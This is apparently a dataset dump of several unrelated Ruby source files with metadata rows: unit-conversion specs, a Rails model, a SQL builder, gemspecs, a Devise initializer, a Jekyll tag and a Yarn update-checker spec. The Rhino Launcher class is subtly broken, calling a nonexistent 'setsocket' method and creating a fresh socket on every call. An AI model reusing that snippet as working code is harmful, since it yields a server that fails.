subject { described_class.parse('100 dal') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'liters' do
subject { described_class.parse('1000 l') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'deciliters' do
subject { described_class.parse('10000 dl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'centiliters' do
subject { described_class.parse('100000 cl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'milliliters' do
subject { described_class.parse('1000000 ml') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'microliters' do
subject { described_class.parse('10000000 µl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
end
end
| 24.931298 | 63 | 0.672994 |
7af75c2725a6d98b9ffc2d11fa1d491b0fad1ffa | 408 | class User < ApplicationRecord
before_save { self.email = email.downcase }
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX }
has_secure_password
validates :password, presence: true, length: { minimum: 6 }
end
| 40.8 | 61 | 0.634804 |
012152f83fc6ea2d363a8e5591d2442669a148a6 | 2,072 | module Terrazine
class Builder
# doesn't use Predicates
# use Operators, Expressions
private
# TODO: split
def build_tables(structure)
case structure
when Array
if check_alias(structure.first) # VALUES function or ...?
build_operator(structure)
# if it's a array with strings/values || array of tables/values
else
joiner = structure.select { |i| i.is_a? Array }.empty? ? ' ' : ', '
structure.map { |i| build_tables i }.join joiner
end
when Hash
"(#{build_sql structure})"
when String, Symbol
structure
else
raise "Undefined structure for FROM - #{structure}"
end
end
# TODO: split
def build_columns(structure, prefix = nil)
case structure
when Array
# SQL function - in format: "_#{fn}"
if check_alias(structure.first)
build_operator structure, prefix
else
structure.map { |i| build_columns i, prefix }.join ', '
end
when Hash
# sub_query
if structure[:select]
"(#{build_sql(structure)})"
# colum OR table alias
else
iterate_hash(structure) do |k, v|
if check_alias(k)
# update ruby for delete_prefix? =)
"#{build_columns(v, prefix)} AS #{k.to_s.sub(/^_/, '')}"
# construct_as(build_columns(v, prefix), k)
else
build_columns(v, k.to_s)
end
end
end
when Symbol, String, Integer
structure = structure.to_s
if prefix && structure !~ /, |\.|\(/
"#{prefix}.#{structure}"
else
structure
end
when Constructor
"(#{build_sql structure.structure})"
when true # choose everything -_-
build_columns('*', prefix)
else # TODO: values from value passing here... -_-
structure
# raise "Undefined class: #{structure.class} of #{structure}" # TODO: ERRORS class
end
end
end
end
| 28.383562 | 90 | 0.54971 |
335cade3bfe7391784bf8ddc5980b3aa15506f7d | 2,104 | # -*- encoding: utf-8 -*-
# stub: railties 5.2.0 ruby lib
Gem::Specification.new do |s|
s.name = "railties".freeze
s.version = "5.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "changelog_uri" => "https://github.com/rails/rails/blob/v5.2.0/railties/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/rails/tree/v5.2.0/railties" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["David Heinemeier Hansson".freeze]
s.bindir = "exe".freeze
s.date = "2018-04-09"
s.description = "Rails internals: application bootup, plugins, generators, and rake tasks.".freeze
s.email = "[email protected]".freeze
s.executables = ["rails".freeze]
s.files = ["exe/rails".freeze]
s.homepage = "http://rubyonrails.org".freeze
s.licenses = ["MIT".freeze]
s.rdoc_options = ["--exclude".freeze, ".".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.2.2".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Tools for creating, working with, and running Rails applications.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<activesupport>.freeze, ["= 5.2.0"])
s.add_runtime_dependency(%q<actionpack>.freeze, ["= 5.2.0"])
s.add_runtime_dependency(%q<rake>.freeze, [">= 0.8.7"])
s.add_runtime_dependency(%q<thor>.freeze, [">= 0.18.1", "< 2.0"])
s.add_runtime_dependency(%q<method_source>.freeze, [">= 0"])
s.add_development_dependency(%q<actionview>.freeze, ["= 5.2.0"])
else
s.add_dependency(%q<activesupport>.freeze, ["= 5.2.0"])
s.add_dependency(%q<actionpack>.freeze, ["= 5.2.0"])
s.add_dependency(%q<rake>.freeze, [">= 0.8.7"])
s.add_dependency(%q<thor>.freeze, [">= 0.18.1", "< 2.0"])
s.add_dependency(%q<method_source>.freeze, [">= 0"])
s.add_dependency(%q<actionview>.freeze, ["= 5.2.0"])
end
end
| 44.765957 | 208 | 0.67538 |
284da843eb65fc967036a17649a1dc7f2e4832a7 | 228 | class CreateInvitationsUsers < ActiveRecord::Migration[5.2]
def change
create_table :invitations_users, id: false do |t|
t.belongs_to :invitation, index: true
t.belongs_to :user, index: true
end
end
end
| 25.333333 | 59 | 0.70614 |
38017db05b2043cc0ab139927ceeae02d528a61f | 78 | # frozen_string_literal: true
module ActsAsRemovable
VERSION = '3.1.1'
end
| 13 | 29 | 0.75641 |
87500d1c8199ed1a03b6becd2219a9225a130901 | 756 | require 'cgi'
require 'json'
require 'httparty'
require 'smarty_streets/version'
require 'smarty_streets/configuration'
require 'smarty_streets/location'
require 'smarty_streets/request'
module SmartyStreets
  class << self
    attr_accessor :configuration

    # Configures the client credentials and options:
    #
    #   SmartyStreets.configure do |config|
    #     config.auth_id    = 'AUTHID'
    #     config.auth_token = 'AUTHTOKEN'
    #     config.candidates = 1
    #   end
    def configure
      self.configuration = Configuration.new
      yield configuration
    end

    # Yields a fresh Location to the caller's block, then submits it for
    # address standardization and returns the request's result.
    def standardize
      location = Location.new.tap { |loc| yield loc }
      Request.new(location).standardize!
    end
  end
end
| 22.909091 | 49 | 0.691799 |
6227e42019d39612b0e051edfcb1b336de1796ab | 13,561 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
  # ==> Mailer
  # "From" address used by Devise::Mailer (overridden if a custom mailer
  # class sets its own default :from).
  config.mailer_sender = '[email protected]'

  # ==> ORM
  # Back Devise with ActiveRecord.
  require 'devise/orm/active_record'

  # ==> Authentication keys
  # Emails are matched case-insensitively and with surrounding whitespace
  # stripped, both when saving a record and when authenticating.
  config.case_insensitive_keys = [:email]
  config.strip_whitespace_keys = [:email]

  # Do not store the user in session for HTTP basic auth requests.
  config.skip_session_storage = [:http_auth]

  # ==> database_authenticatable
  # bcrypt cost: a single stretch keeps the test suite fast; 11 elsewhere.
  config.stretches = Rails.env.test? ? 1 : 11

  # ==> confirmable
  # Email changes are applied immediately, without re-confirmation.
  config.reconfirmable = false

  # ==> rememberable
  # Signing out invalidates all of the user's remember-me tokens.
  config.expire_all_remember_me_on_sign_out = true

  # ==> validatable
  config.password_length = 6..128
  # Loose format check only: one "@" with no surrounding whitespace. This is
  # user feedback, not a full RFC validation.
  config.email_regexp = /\A[^@\s]+@[^@\s]+\z/

  # ==> recoverable
  # Reset-password tokens stay valid for six hours.
  config.reset_password_within = 6.hours

  # /users/sign_out signs out only the current scope, not every scope.
  config.sign_out_all_scopes = false

  # Sign out via HTTP DELETE.
  config.sign_out_via = :delete

  # ==> Mountable engine configuration
  # This initializer lives inside the Erp engine, so Devise's route helpers
  # and base controller must point back at that engine.
  config.router_name = :erp
  config.parent_controller = 'Erp::ApplicationController'
end
| 48.956679 | 154 | 0.751198 |
398fdc91cfb6d83246afab13c16f009e87a9ab1c | 231 | module ChartmogulClient::Consts
module ApiVersions
V1 = 'v1'
end
module HttpStatuses
BAD_REQUEST = 400
SERVER_ERROR = 500
end
module HttpMethods
GET = :get
POST = :post
DELETE = :delete
end
end | 14.4375 | 31 | 0.65368 |
61f8e2ab187a0a9aa5cfaccb373b8a6c0e12c7ca | 6,344 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_04_01
module Models
#
# Private endpoint resource.
#
class PrivateEndpoint < Resource
include MsRestAzure
# @return [Subnet] The ID of the subnet from which the private IP will be
# allocated.
attr_accessor :subnet
# @return [Array<NetworkInterface>] Gets an array of references to the
# network interfaces created for this private endpoint.
attr_accessor :network_interfaces
# @return [String] The provisioning state of the private endpoint.
# Possible values are: 'Updating', 'Deleting', and 'Failed'.
attr_accessor :provisioning_state
# @return [Array<PrivateLinkServiceConnection>] A grouping of information
# about the connection to the remote resource.
attr_accessor :private_link_service_connections
# @return [Array<PrivateLinkServiceConnection>] A grouping of information
# about the connection to the remote resource. Used when the network
# admin does not have access to approve connections to the remote
# resource.
attr_accessor :manual_private_link_service_connections
# @return [String] Gets a unique read-only string that changes whenever
# the resource is updated.
attr_accessor :etag
#
# Mapper for PrivateEndpoint class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'PrivateEndpoint',
type: {
name: 'Composite',
class_name: 'PrivateEndpoint',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
subnet: {
client_side_validation: true,
required: false,
serialized_name: 'properties.subnet',
type: {
name: 'Composite',
class_name: 'Subnet'
}
},
network_interfaces: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.networkInterfaces',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'NetworkInterfaceElementType',
type: {
name: 'Composite',
class_name: 'NetworkInterface'
}
}
}
},
provisioning_state: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
private_link_service_connections: {
client_side_validation: true,
required: false,
serialized_name: 'properties.privateLinkServiceConnections',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'PrivateLinkServiceConnectionElementType',
type: {
name: 'Composite',
class_name: 'PrivateLinkServiceConnection'
}
}
}
},
manual_private_link_service_connections: {
client_side_validation: true,
required: false,
serialized_name: 'properties.manualPrivateLinkServiceConnections',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'PrivateLinkServiceConnectionElementType',
type: {
name: 'Composite',
class_name: 'PrivateLinkServiceConnection'
}
}
}
},
etag: {
client_side_validation: true,
required: false,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 33.389474 | 82 | 0.466425 |
d5ac3bd90372c75d776d845e345c3cc60bd60ac5 | 145 | RSpec.describe MatchboxRails do
it "has a version number" do
expect(MatchboxRails::VERSION).not_to be nil
end
# TODO: Write tests
end
| 18.125 | 48 | 0.731034 |
0331b037c26a0b14b55bd822add6f3f391b9b2b7 | 2,446 | require_relative 'lib/tuga/version'
Gem::Specification.new do |spec|
  # --- Gem identity and authorship -------------------------------------
  spec.name          = 'tuga'
  spec.version       = Tuga::VERSION
  spec.authors       = ['Wilson Silva']
  spec.email         = ['[email protected]']
  spec.summary       = 'A Portuguese script programming language.'
  spec.description   = 'A Portuguese script programming language meant for educational purposes.'
  spec.homepage      = 'https://github.com/wilsonsilva/tuga'
  spec.license       = 'MIT'
  # Only Ruby 2.6.x is supported — see the parser version pins below.
  spec.required_ruby_version = Gem::Requirement.new('~> 2.6.0')
  # RubyGems.org metadata links.
  spec.metadata['homepage_uri'] = spec.homepage
  spec.metadata['source_code_uri'] = 'https://github.com/wilsonsilva/tuga'
  spec.metadata['changelog_uri'] = 'https://github.com/wilsonsilva/tuga/blob/master/CHANGELOG.md'
  # Specify which files should be added to the gem when it is released.
  # The `git ls-files -z` loads the files in the RubyGem that have been added into git.
  spec.files = Dir.chdir(File.expand_path(__dir__)) do
    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
  end
  spec.bindir        = 'bin'
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.require_paths = ['lib']
  # These versions of the parsers and transpilers are compatible with Ruby 2.6. Recent versions are not.
  spec.add_dependency 'ruby2ruby', '= 2.4.4'
  spec.add_dependency 'ruby_parser', '= 3.14.2'
  # --- Development-only tooling ----------------------------------------
  spec.add_development_dependency 'bundler', '~> 2.0'
  spec.add_development_dependency 'bundler-audit', '~> 0.6'
  spec.add_development_dependency 'guard', '~> 2.16'
  spec.add_development_dependency 'guard-bundler', '~> 3.0'
  spec.add_development_dependency 'guard-bundler-audit', '~> 0.1'
  spec.add_development_dependency 'guard-rspec', '~> 4.7'
  spec.add_development_dependency 'guard-rubocop', '~> 1.3'
  spec.add_development_dependency 'overcommit', '~> 0.53'
  spec.add_development_dependency 'pry', '~> 0.13'
  spec.add_development_dependency 'rake', '~> 12.3'
  spec.add_development_dependency 'rspec', '~> 3.0'
  spec.add_development_dependency 'rubocop', '~> 0.85'
  spec.add_development_dependency 'rubocop-rspec', '~> 1.39'
  spec.add_development_dependency 'simplecov', '~> 0.17.1'
  spec.add_development_dependency 'simplecov-console', '~> 0.7'
  spec.add_development_dependency 'yard', '~> 0.9'
  spec.add_development_dependency 'yard-junk', '~> 0.0.7'
  spec.add_development_dependency 'yardstick', '~> 0.9'
end
| 47.038462 | 104 | 0.699509 |
62967d85ca092d10405b8797cbd1deec388794b3 | 164 | # Load the rails application
# Load the rails application
require_relative 'application'

# Initialize the rails application
Rails300ActiveRecord::Application.initialize!
| 27.333333 | 52 | 0.817073 |
79b1c52ddbd71cf803ffb3a8de453b04e9a1362c | 134 | RSpec.describe HatenablogPublisher do
it "has a version number" do
expect(HatenablogPublisher::VERSION).not_to be nil
end
end
| 22.333333 | 54 | 0.776119 |
d55d9a0033c7f592bba6f583c0f0b653bc832a3f | 168 | # frozen_string_literal: true
require 'octokit'

# SECURITY FIX: the personal access token was previously hard-coded in this
# file (and therefore leaked through version control — it must be revoked).
# Read it from the environment instead; ENV.fetch fails fast with KeyError
# when GITHUB_ACCESS_TOKEN is not set.
client = Octokit::Client.new(access_token: ENV.fetch('GITHUB_ACCESS_TOKEN'))
# Fetch the authenticated user and return their login name.
user = client.user
user.login
| 18.666667 | 86 | 0.809524 |
e811937d9cb9f6cd4186578b4608803f39845de6 | 1,815 | require 'transcode'
# Represents an encoding format and encoding options used to transcode an audio
# file from one format to another. This is an analog to the
# `ActiveStorage::Variation` class for images. An encoding can be coded into a
# URL.
class Transcode::Encoding
  # @return [String] The target format's file extension, such as "mp3".
  attr_reader :format

  # @return [Array<String>, Hash<String, String>] FFMPEG transcode options,
  #   either as raw CLI flags (such as "-a:c 1") or as StreamIO-style options
  #   (such as `{audio_channels: 1}`).
  attr_reader :options

  # @private
  def self.wrap(descriptor, options=nil)
    if descriptor.is_a?(self)
      descriptor
    elsif descriptor.is_a?(Hash)
      decode descriptor[:key]
    elsif descriptor.is_a?(String)
      new descriptor, options
    else
      raise ArgumentError, "Can't wrap #{descriptor.class}"
    end
  end

  # @private
  def self.decode(key)
    format, options = ActiveStorage.verifier.verify(key, purpose: :encoding)
    new(format, options)
  end

  # @private
  def self.encode(format, options)
    ActiveStorage.verifier.generate([format, options], purpose: :encoding)
  end

  # @private
  def initialize(format, options=nil)
    unless format.kind_of?(String)
      raise ArgumentError, "expect string format, got #{format.class}"
    end
    @format = format
    @options = options || {}
  end

  # @return [String] The signed key to embed in URLs when describing this
  #   transcode operation.
  def key
    self.class.encode format, options
  end

  # @return [String] The extension for transcoded files, including the
  #   leading period.
  def extension
    ".#{format}"
  end

  # @return [Mime::Type] The MIME type registered for the target format.
  def mime_type
    Mime::Type.lookup_by_extension(format)
  end
end
| 25.208333 | 95 | 0.684848 |
bb228ee8f86b4c107e2861430b87cbfa02345938 | 1,480 | require 'rouge'
module Jekyll
  # Liquid tag that extracts a named, delimiter-marked section from a source
  # file and renders it as Rouge-highlighted HTML. Sections are marked in the
  # source with `/// code_ref: name` ... `/// end_code_ref` (or `###` for
  # hash-comment languages).
  #
  # Usage: {% code_ref path/to/file.rb section_name %}
  class CodeRefTag < Liquid::Tag
    def initialize(tag_name, args, tokens)
      # Split on the *last* space so the file path may itself contain spaces:
      # everything before it is the path, the final token is the section key.
      all = args.strip.reverse.split(' ')
      item = all.first.reverse
      file = all[1..-1].join(" ").reverse
      raise "You need to specify a name for the section to fetch" if all.size == 1
      super
      @file = file
      @item = item
    end

    # Wraps Rouge's <pre> output in <code> tags carrying the language class.
    # NOTE(review): `lang` is interpolated with #to_s; when called from
    # #render it receives a Rouge lexer object — confirm the resulting class
    # attribute is the intended value (lexer.tag may have been meant).
    def add_code_tags(code, lang)
      code = code.to_s
      code = code.sub(/<pre>/, "<pre><code class=\"language-#{lang}\" data-lang=\"#{lang}\">")
      code = code.sub(/<\/pre>/, "</code></pre>")
    end

    # Re-indents a captured snippet so its left margin starts at column zero.
    # The first line keeps its indentation (it directly follows the marker).
    def strip_margin(text, spaces)
      lines = text.strip.split("\n")
      lines[0] << "\n" << lines[1..-1].map { |l| l[spaces..-1] }.join("\n")
    end

    def render(context)
      return "Code ref file '#{@file}' does not exist." unless File.exist?(@file)

      indented = (File.read(@file).match(/(?:\/\/\/|###)\s*code_ref\s*\:\s*#{@item}(.*?)(?:\/{3}|###)\s*end_code_ref/mi) || [])[1]
      # BUG FIX: this guard must run *before* the captured text is used.
      # Previously it ran after `indented[1..-1]`, so a missing section
      # crashed with NoMethodError on nil instead of returning this message.
      return "No code matched the key #{@item} in #{@file}" unless indented

      spaces = indented[1..-1].match(/(\s*)[^ ]/)[1].size
      code = spaces == 0 ? indented : strip_margin(indented, spaces)
      lexer = Rouge::Lexer.find(File.extname(@file).gsub(/^\./, ''))
      formatter = Rouge::Formatters::HTML.new({ wrap: true })
      add_code_tags(formatter.format(lexer.lex(code)), lexer)
    end
  end
end
Liquid::Template.register_tag('code_ref', Jekyll::CodeRefTag) | 32.173913 | 128 | 0.578378 |
08085cfba00a21cb5a1f01063001cd2379cfb095 | 659 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module RuShambo
  # Application-wide Rails configuration for the RuShambo app.
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    config.load_defaults 5.2

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration can go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded after loading
    # the framework and any gems in your application.
  end
end
| 32.95 | 82 | 0.764795 |
915dbe72331e6fd0921b018f8d98f3273d2fc1d9 | 913 | module Rhino
class Launcher
def initialize(port, bind, reuseaddr, backlog, config)
@port = port
@bind = bind
@reuseaddr = reuseaddr
@backlog = backlog
@config = config
end
def run
log_run
begin
socket.setsocket(:SOL_SOCKET, :SO_REUSEADDR, @reuseaddr)
socket.bind(addrinfo)
socket.listen(@backlog)
server = Server.new(application, [socket])
server.run
end
end
private
def log_run
Logger.log('Rhino')
Logger.log("#{@bind}:#{@port}")
end
def socket
Socket.new(:INET, :STREAM)
end
def application
eval(builder, nil, @config)
end
def addrinfo
Addrinfo.tcp(@bind, @port)
end
def raw
File.read(@config)
end
def builder
<<~BUILDER
Rack::Builder.new do
#{raw}
end
BUILDER
end
end
end
| 16.303571 | 64 | 0.556407 |
796cdfad88c46e6733f3508e3e05331d41d77643 | 41 | module JustInform
VERSION = "0.0.6"
end | 13.666667 | 19 | 0.707317 |
339ece780365cf3487dc0111162f71a6e965aae7 | 500 | require "foreman/version"
module Foreman
  # Raised when the targeted application directory does not exist.
  class AppDoesNotExist < Exception; end

  # Loads the contents of +env_file+ into ENV.
  def self.load_env!(env_file = './.env')
    require 'foreman/engine'
    Foreman::Engine.load_env!(env_file)
  end

  # Absolute path to the bundled foreman-runner executable.
  def self.runner
    File.expand_path('../../bin/foreman-runner', __FILE__)
  end

  # True when running on JRuby.
  def self.jruby?
    defined?(RUBY_PLATFORM) && RUBY_PLATFORM == 'java'
  end

  # Truthy when running on a win32 platform.
  def self.windows?
    defined?(RUBY_PLATFORM) && RUBY_PLATFORM =~ /(win|w)32$/
  end
end
| 19.230769 | 61 | 0.69 |
6206a8692442810bdb10fe91347980f29142acc7 | 2,761 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2016_04_30_preview
module Models
#
# The List Image operation response.
#
class ImageListResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<Image>] The list of Images.
attr_accessor :value
# @return [String] The uri to fetch the next page of Images. Call
# ListNext() with this to fetch the next page of Images.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<Image>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ImageListResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ImageListResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ImageListResult',
type: {
name: 'Composite',
class_name: 'ImageListResult',
model_properties: {
value: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ImageElementType',
type: {
name: 'Composite',
class_name: 'Image'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.61 | 80 | 0.517204 |
f87cdeefe3aed56bc19add708cf9c686a3c4a323 | 1,090 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
require "json"

# Keep the pod's version in lock-step with the npm package version declared
# two directories up in package.json.
package = JSON.parse(File.read(File.join(__dir__, "..", "..", "package.json")))
version = package['version']

source = { :git => 'https://github.com/facebook/react-native.git' }
if version == '1000.0.0'
  # This is an unpublished version, use the latest commit hash of the react-native repo, which we're presumably in.
  source[:commit] = `git rev-parse HEAD`.strip
else
  source[:tag] = "v#{version}"
end

Pod::Spec.new do |s|
  s.name         = "React-jsinspector"
  s.version      = version
  s.summary      = "-" # TODO
  s.homepage     = "https://reactnative.dev/"
  s.license      = package["license"]
  s.author       = "Facebook, Inc. and its affiliates"
  s.platforms    = { :ios => "10.0" }
  s.source       = source
  s.source_files = "*.{cpp,h}"
  s.header_dir   = 'jsinspector'
end
| 35.16129 | 115 | 0.584404 |
0346890830d328291c9526e17b2710fa312cb345 | 896 | # coding: utf-8
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'phttp/version'

Gem::Specification.new do |spec|
  spec.name          = "phttp"
  spec.version       = PHTTP::VERSION
  spec.authors       = ["Kim Burgestrand", "Jonas Nicklas"]
  spec.email         = ["[email protected]", "[email protected]"]
  spec.summary       = "Promising Typhoeus HTTP requests."
  spec.homepage      = ""
  spec.license       = "MIT"

  # Ship exactly what git tracks; executables come from bin/.
  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_dependency "typhoeus"

  spec.add_development_dependency "rspec", "~> 2.0"
  spec.add_development_dependency "bundler", "~> 1.3"
  spec.add_development_dependency "rake"
end
| 35.84 | 74 | 0.651786 |
bb0948157431f46224092167c7fb36dee8ab314c | 5,663 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/update_checkers/java_script/yarn"
require_relative "../shared_examples_for_update_checkers"

RSpec.describe Dependabot::UpdateCheckers::JavaScript::Yarn do
  it_behaves_like "an update checker"

  # Every example hits the npm registry; stub it with a canned response
  # (individual contexts re-stub with different fixtures as needed).
  before do
    stub_request(:get, "https://registry.npmjs.org/etag").
      to_return(status: 200, body: fixture("javascript", "npm_response.json"))
  end

  let(:checker) do
    described_class.new(
      dependency: dependency,
      dependency_files: [],
      github_access_token: "token"
    )
  end

  # Default dependency under test; overridden per-context below.
  let(:dependency) do
    Dependabot::Dependency.new(
      name: "etag",
      version: "1.0.0",
      requirements: [{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }],
      package_manager: "yarn"
    )
  end
describe "#needs_update?" do
subject { checker.needs_update? }
context "given an outdated dependency" do
it { is_expected.to be_truthy }
end
context "given an up-to-date dependency" do
let(:dependency) do
Dependabot::Dependency.new(
name: "etag",
version: "1.7.0",
requirements: [
{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }
],
package_manager: "yarn"
)
end
it { is_expected.to be_falsey }
end
context "for a scoped package name" do
before do
stub_request(:get, "https://registry.npmjs.org/@blep%2Fblep").
to_return(
status: 200,
body: fixture("javascript", "npm_response.json")
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: "@blep/blep",
version: "1.0.0",
requirements: [
{ file: "yarn.lock", requirement: "^1.0.0", groups: [] }
],
package_manager: "yarn"
)
end
it { is_expected.to be_truthy }
end
end
describe "#latest_resolvable_version" do
subject { checker.latest_resolvable_version }
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
context "when the npm link resolves to a redirect" do
let(:redirect_url) { "https://registry.npmjs.org/eTag" }
before do
stub_request(:get, "https://registry.npmjs.org/etag").
to_return(status: 302, headers: { "Location" => redirect_url })
stub_request(:get, redirect_url).
to_return(
status: 200,
body: fixture("javascript", "npm_response.json")
)
end
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
end
end
describe "#latest_version" do
subject { checker.latest_version }
it { is_expected.to eq(Gem::Version.new("1.7.0")) }
context "when the latest version is a prerelease" do
before do
body = fixture("javascript", "npm_response_prerelease.json")
stub_request(:get, "https://registry.npmjs.org/etag").
